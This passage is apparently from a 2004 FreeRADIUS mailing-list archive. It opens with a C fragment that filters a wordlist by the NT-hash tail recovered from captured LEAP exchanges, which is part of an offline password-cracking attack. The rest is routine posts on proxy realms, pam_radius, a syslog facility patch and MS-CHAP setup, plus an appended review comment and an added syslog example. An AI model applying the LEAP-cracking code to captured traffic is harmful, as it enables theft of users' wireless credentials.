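    uint8_t utf16[256]; size_t n = strlen(password), i;
    if (n > 128) n = 128;
    for (i = 0; i < n; i++) { utf16[2*i] = (uint8_t)password[i]; utf16[2*i+1] = 0; }
    md4(utf16, 2 * n, out);
}

/* Compare the NT hash of password with a lowercase hex string. */
int nt_hash_is(const char *password, const char *hex) {
    static const char *digits = "0123456789abcdef";
    uint8_t h[16]; char s[33]; size_t i;
    nt_hash(password, h);
    for (i = 0; i < 16; i++) { s[2*i] = digits[h[i] >> 4]; s[2*i+1] = digits[h[i] & 15]; }
    s[32] = 0;
    return strcmp(s, hex) == 0;
}

/* Bytes 14..15 of the NT hash: the only secret material in the third DES key
 * (hash[14..15] plus five zero bytes), hence recoverable with 2^16 DES trials. */
uint16_t nt_hash_tail(const char *password) {
    uint8_t h[16]; nt_hash(password, h);
    return (uint16_t)((h[14] << 8) | h[15]);
}

/* Stage two: keep dictionary words whose tail matches the recovered one
 * (about 1 in 65536 survive); survivors would then be checked with DES. */
size_t filter_by_tail(const char *const *words, size_t n, uint16_t tail,
                      const char **out, size_t max_out) {
    size_t i, kept = 0;
    for (i = 0; i < n && kept < max_out; i++)
        if (nt_hash_tail(words[i]) == tail) out[kept++] = words[i];
    return kept;
}

int main(void) {
    /* constructed wordlist; 0x586c is the tail an attacker would recover from a
     * capture of a user whose password is "password" */
    static const char *const words[] = {"letmein", "Summer2004", "password", "qwerty"};
    const char *hits[4]; size_t n = filter_by_tail(words, 4, 0x586c, hits, 4), i;
    for (i = 0; i < n; i++) printf("candidate: %s\n", hits[i]);
    return 0;
}
```

Note that the filter is independent of the challenge: the tail index can be precomputed once per dictionary and reused across every captured LEAP exchange, which is what makes strong passwords a weak defence compared with a tunnelled method such as PEAP or EAP-TTLS.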
Re: Bug/security EAP-TLS
The patch checked out OK and has been committed. -- --Mike --- Michael Griego Wireless LAN Project Manager The University of Texas at Dallas - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Max number of realms FreeRadius Can handle.
Hello, I am currently running 2 production FreeRadius servers (version 1.0.0) on Redhat 9.0 tied to a single dedicated M$ SQL server backend. The SQL server is used primarily for radius accounting but also contains username/password information for half a dozen realms. The radius servers are used primarily for proxying but we do have some local realms. Both radius servers are identical in terms of hardware, specs and radius configuration. The two radius servers have identical proxy.conf files and are used to split the total load. Setting hardware considerations aside for the moment, what is the max number of realms that FreeRadius can proxy to? I currently proxy to over 60 realms and have to add another 28 realms and I am wondering if it isn't time to redesign things. Thanks, Dave - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: How does one compile pam-radius auth???
Actually there isn't a radius.h in that directory. If you go to: http://www.freeradius.org/pam_radius_auth/ to download the pam_radius stuff. I dug around some more and decided to look at the actual ftp server, where I found ftp://ftp.freeradius.org/pub/radius/pam_radius-1.3.16.tar I downloaded that and it compiled without a problem (duh). Might I suggest a link to the tar file on the ftp server from the download page? Thanks for the help. Roger - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: How does one compile pam-radius auth???
Correction, might I suggest an id10t-error-proof link to the ftp site??? :-) Something that says: You MUST get it here? It's been one of those months. Too much to do and too little time. On Tue, 31 Aug 2004 14:48:44 -0700, roger weiss [EMAIL PROTECTED] wrote: Actually there isn't a radius.h in that directory. If you go to: http://www.freeradius.org/pam_radius_auth/ to download the pam_radius stuff. I dug around some more and decided to look at the actual ftp server, where I found ftp://ftp.freeradius.org/pub/radius/pam_radius-1.3.16.tar I downloaded that and it compiled without a problem (duh). Might I suggest a link to the tar file on the ftp server from the download page? Thanks for the help. Roger - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
syslog_facility ignored
relevant portion of radiusd.conf: log_destination = syslog log { # Yes, I read the comment about changing this. syslog_facility = local1 } Using the latest code from CVS on RedHat Linux 8.0, the syslog_facility directive is seemingly ignored and all messages go to /var/log/messages regardless of the setting. The call to syslog in log.c does not OR the level with the facility, so messages are sent to the default facility. That would be fine if openlog were called to set the configured facility, but it resides in rlm_pam.c where it never gets called for my config. The following simple change to log.c resolves the problem, but I suspect it would be preferable to move the openlog call. --- log.c 2004-08-31 14:48:34.0 -0700 +++ log.c.patched 2004-08-31 14:31:53.0 -0700 @@ -194,7 +194,7 @@ lvl = LOG_ERR; break; } - syslog(lvl, %s, buffer + len); /* don't print timestamp */ + syslog(lvl | mainconfig.syslog_facility, %s, buffer + len); /* don't print timestamp */ } #endif - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
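Review bot: the new `syslog(lvl | mainconfig.syslog_facility, ...)` call only works if mainconfig.syslog_facility already holds the LOG_LOCAL1-style constant (facility value shifted into the facility bits); if the configuration parser stores a plain facility number, the OR sets no facility bits and syslog(3) still falls back to the default facility, which is exactly the symptom being fixed. Since the message itself notes the openlog() call lives in rlm_pam.c and is never reached for this configuration, calling openlog() once with the parsed facility at startup would both fix the bug and avoid repeating the facility on every call; if the per-call OR is kept, the facility constant should be validated where it is parsed.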
FreeRADIUS vulnerabilities
On a packetstorm mirror this weekend I saw a new RADIUS test package. Downloaded it and noticed there were scripts for exploiting vulnerabilities with FreeRADIUS. Has anyone looked into this package and what is the FreeRADIUS team doing to fix the issues with 1.0 as listed in the exploit. Phorcedaccess - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: syslog_facility ignored
Yeah, I was actually going to put in a somewhat different patch later this evening. --Mike On Tue, 2004-08-31 at 18:41, David Hart wrote: relevant portion of radiusd.conf: log_destination = syslog log { # Yes, I read the comment about changing this. syslog_facility = local1 } Using the latest code from CVS on RedHat Linux 8.0, the syslog_facility directive is seemingly ignored and all messages go to /var/log/messages regardless of the setting. The call to syslog in log.c does not OR the level with the facility, so messages are sent to the default facility. That would be fine if openlog were called to set the configured facility, but it resides in rlm_pam.c where it never gets called for my config. The following simple change to log.c resolves the problem, but I suspect it would be preferable to move the openlog call. --- log.c 2004-08-31 14:48:34.0 -0700 +++ log.c.patched 2004-08-31 14:31:53.0 -0700 @@ -194,7 +194,7 @@ lvl = LOG_ERR; break; } - syslog(lvl, %s, buffer + len); /* don't print timestamp */ + syslog(lvl | mainconfig.syslog_facility, %s, buffer + len); /* don't print timestamp */ } #endif - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Question about use freeradius in MIP
hi all: can freeradius receive IKE Pre-shared Secret Request(Type:26) and send Pre-shared secret? for in MOBILE IP ,HA requires the MN-HA shared key from the RADIUS server, the HA shall send a RADIUS Access-Request that includes a User Name, a User-Password and an MN-HA SPI,The Home RADIUS server shall process the Access-Request. If the MN-HA shared key is requested, the Home RADIUS server shall encrypt the MN-HA shared key in a RADIUS Access-Accept
Re: syslog_facility ignored
Get tomorrow's CVS snapshot. It will be fixed there. --Mike On Tue, 2004-08-31 at 18:41, David Hart wrote: relevant portion of radiusd.conf: log_destination = syslog log { # Yes, I read the comment about changing this. syslog_facility = local1 } Using the latest code from CVS on RedHat Linux 8.0, the syslog_facility directive is seemingly ignored and all messages go to /var/log/messages regardless of the setting. The call to syslog in log.c does not OR the level with the facility, so messages are sent to the default facility. That would be fine if openlog were called to set the configured facility, but it resides in rlm_pam.c where it never gets called for my config. The following simple change to log.c resolves the problem, but I suspect it would be preferable to move the openlog call. --- log.c 2004-08-31 14:48:34.0 -0700 +++ log.c.patched 2004-08-31 14:31:53.0 -0700 @@ -194,7 +194,7 @@ lvl = LOG_ERR; break; } - syslog(lvl, %s, buffer + len); /* don't print timestamp */ + syslog(lvl | mainconfig.syslog_facility, %s, buffer + len); /* don't print timestamp */ } #endif - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
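Added example for the syslog_facility thread above; it is not FreeRADIUS code and the facility table and function names are this example's own assumptions. It shows the two ways a daemon can make a configured facility such as local1 take effect (openlog() once, or OR the facility into every priority as the posted patch does) and the pitfall behind the bug report: syslog(3) only honours a facility carried in the priority when those bits are non-zero, so a priority built from the bare number 1 instead of LOG_LOCAL1 silently lands in the default facility.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <syslog.h>

#ifndef LOG_PRIMASK
#define LOG_PRIMASK 0x07      /* low 3 bits: level */
#endif
#ifndef LOG_FACMASK
#define LOG_FACMASK 0x03f8    /* bits 3..9: facility */
#endif

struct facility_name { const char *name; int value; };

/* Names accepted for the hypothetical "syslog_facility = ..." setting. This
 * table is an assumption of the example, not FreeRADIUS's own parser. */
static const struct facility_name facility_table[] = {
    {"kern", LOG_KERN},     {"user", LOG_USER},     {"mail", LOG_MAIL},
    {"daemon", LOG_DAEMON}, {"auth", LOG_AUTH},     {"syslog", LOG_SYSLOG},
    {"lpr", LOG_LPR},       {"news", LOG_NEWS},     {"uucp", LOG_UUCP},
    {"cron", LOG_CRON},     {"local0", LOG_LOCAL0}, {"local1", LOG_LOCAL1},
    {"local2", LOG_LOCAL2}, {"local3", LOG_LOCAL3}, {"local4", LOG_LOCAL4},
    {"local5", LOG_LOCAL5}, {"local6", LOG_LOCAL6}, {"local7", LOG_LOCAL7},
};

/* Map a configured facility name (case-insensitive) to its LOG_* constant,
 * which already has the facility shifted into bits 3..9; -1 if unknown. */
int facility_from_name(const char *name) {
    size_t i;
    for (i = 0; i < sizeof facility_table / sizeof facility_table[0]; i++)
        if (strcasecmp(name, facility_table[i].name) == 0)
            return facility_table[i].value;
    return -1;
}

/* What the per-call patch computes: level bits OR facility bits. */
int compose_priority(int level, int facility) { return level | facility; }
int facility_bits(int priority) { return priority & LOG_FACMASK; }
int level_bits(int priority) { return priority & LOG_PRIMASK; }

/* syslog(3) uses the facility in the priority only when those bits are set;
 * otherwise it uses the openlog() facility (LOG_USER if openlog was never
 * called). Returns 1 if this priority will reach the configured facility. */
int facility_is_carried(int priority) { return facility_bits(priority) != 0; }

int main(void) {
    int fac = facility_from_name("local1");
    /* Approach A: set the facility once, then log with plain levels. */
    openlog("radiusd-example", LOG_PID, fac);
    syslog(LOG_ERR, "example: facility taken from openlog()");
    /* Approach B (the posted patch): carry the facility in every priority. */
    syslog(compose_priority(LOG_ERR, fac), "example: facility carried in priority");
    /* Pitfall: storing the "1" of local1 instead of LOG_LOCAL1 carries nothing. */
    printf("local1 -> %d; LOG_LOCAL1 carried: %d; bare 1 carried: %d\n", fac,
           facility_is_carried(compose_priority(LOG_ERR, fac)),
           facility_is_carried(compose_priority(LOG_ERR, 1)));
    closelog();
    return 0;
}
```

Whichever approach is used, it pays to check the parsed value once at startup rather than trusting every call site to OR the right thing in; with openlog() the level/facility split lives in one place, which is the simpler design.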
RE: MS-CHAP can't work
Dear Alan: Thanks for your reply. Do you mean the Cisco doesn't send the authentication method to FreeRADIUS? Is the RADIUS config on the Cisco wrong? Thank you for your help again. I see so many answers from you. You are really a good teacher. interface Virtual-Template2 ip unnumbered FastEthernet0/0 peer default ip address pool pptp-pool ppp max-bad-auth 4 ppp encrypt mppe auto ppp authentication ms-chap-v2 ppp ms-chap refuse radius-server host 211.79.1.25 auth-port 1645 acct-port 1646 key 7 040A59555B radius-server vsa send authentication Best Regards, Bai. -Original Message- From: Alan DeKok [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 31, 2004 11:04 PM To: [EMAIL PROTECTED] Subject: Re: MS-CHAP can't work Bai [EMAIL PROTECTED] wrote: If I try to authenticate to FreeRadius with MS-CHAP, it still hard to work after trying long time. rlm_mschap: No LM/NT password configured. Check authorization. modcall[authenticate]: module mschap returns invalid ... Who can comment what's happen? Thank you very much!!! You have to tell the server what password to use to authenticate the user. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
problem with ServiceType in radacct table
Hi, I am having a problem with the ServiceType field in radacct. I have set up the Service-Type attribute in radgroupreply to 1 i.e. Login-User, but the radacct table is not updated accordingly. In fact, the field remains empty. Any ideas. Thanks. Prabh Freeradius Version 1.0. Linux - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html